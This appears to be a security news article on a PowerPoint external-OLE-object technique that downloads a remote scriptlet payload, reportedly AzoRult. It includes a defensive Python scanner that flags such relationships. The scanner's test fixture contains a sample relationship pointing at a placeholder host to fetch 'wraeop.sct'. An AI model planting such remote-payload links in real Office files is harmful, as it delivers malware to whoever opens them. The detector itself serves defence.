In the nefarious domain of malware attacks, researcher Marco Ramilli has discovered a subtle weakness in Microsoft Office tools, specifically Excel, Word, and PowerPoint, that can be abused to deliver malware.
Abusing this feature can lead to malware drops and repeated cyber attacks, including phishing. MS Office is an easy prey because of its widespread popularity among users.
Much like phishing, the attack relies on the malicious file directing the victim's machine to a link that hosts the payload.
While the technical details of the exploit are laid out by the researcher in his blog post, here is a summarized step-by-step account of how it unfolds.
In the first stage, the infected file, when opened, appears to be nothing more than a blank page while it silently establishes a connection to a malicious link.
In the second stage, the researcher examined the slide structure and noticed an external OLE object; further analysis showed that the file it downloaded onto the system, wraeop.sct, had already infected the target device.
In the third stage, an internal image is used to execute additional code, which leads to the final stage: execution of the payload.
After detailed traffic analysis, Ramilli suspects the malware to be AzoRult.
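The second stage hinges on an external OLE object in the slide's relationships. The following added example (not code from Ramilli's post) unzips a .pptx-style package and flags OLE object relationships marked TargetMode="External", which is the kind of check a mail gateway or sandbox can apply before a file reaches a user. The package builder, the placeholder host name and the sample relationship parts are constructed for this demonstration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
LAYOUT_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout"


def find_external_ole_links(pptx_bytes):
    """Return (rels_part, target) pairs for OLE object relationships whose
    target lies outside the package (TargetMode="External"): content that
    PowerPoint fetches from the network when the slide is rendered."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as pkg:
        for name in pkg.namelist():
            # Relationship parts live under ppt/**/_rels/*.rels
            if not (name.startswith("ppt/") and name.endswith(".rels")):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                external = rel.get("TargetMode", "Internal") == "External"
                if rel.get("Type") == OLE_REL and external:
                    hits.append((name, rel.get("Target", "")))
    return hits


def build_sample_pptx(slide_rels_xml):
    """Constructed minimal OOXML-style package (not a real PowerPoint file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        pkg.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels_xml)
    return buf.getvalue()


def rels_xml(*relationships):
    return '<Relationships xmlns="%s">%s</Relationships>' % (REL_NS, "".join(relationships))


LAYOUT = '<Relationship Id="rId1" Type="%s" Target="../slideLayouts/slideLayout1.xml"/>' % LAYOUT_REL
# Constructed samples: an embedded OLE object (benign) versus a remote one
# (suspicious); the host is a placeholder, wraeop.sct is the file name reported.
BENIGN = rels_xml(LAYOUT, '<Relationship Id="rId2" Type="%s" Target="../embeddings/oleObject1.bin"/>' % OLE_REL)
SUSPICIOUS = rels_xml(LAYOUT, ('<Relationship Id="rId2" Type="%s" '
                               'Target="http://placeholder.invalid/wraeop.sct" TargetMode="External"/>') % OLE_REL)

if __name__ == "__main__":
    print(find_external_ole_links(build_sample_pptx(BENIGN)))      # []
    print(find_external_ole_links(build_sample_pptx(SUSPICIOUS)))  # one hit
```

An embedded OLE object (Target under ../embeddings/, no TargetMode) is left alone; only relationships that make Office reach out to a remote location are reported.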
MS Office exploits: not a bizarre discovery
In the past year, cybercriminals ran a massive malware campaign that relied on malicious PowerPoint email attachments. So, although the present discovery is peculiar, it is not novel: this is not the first exploit of its kind used to drop malware.
However, these findings deserve serious attention, as Ramilli cautioned that MS Office users are susceptible to the attack right now. The exploit could lead to a wave of cyber attacks if preventive measures are not devised in time.
“Microsoft should probably take care of this and try to filter or to ask permissions before including external contents, but still this will not be a complete solution (in my personal point of view). A deeper and more invasive action would be needed to check the remote content,” Ramilli said in his blog post.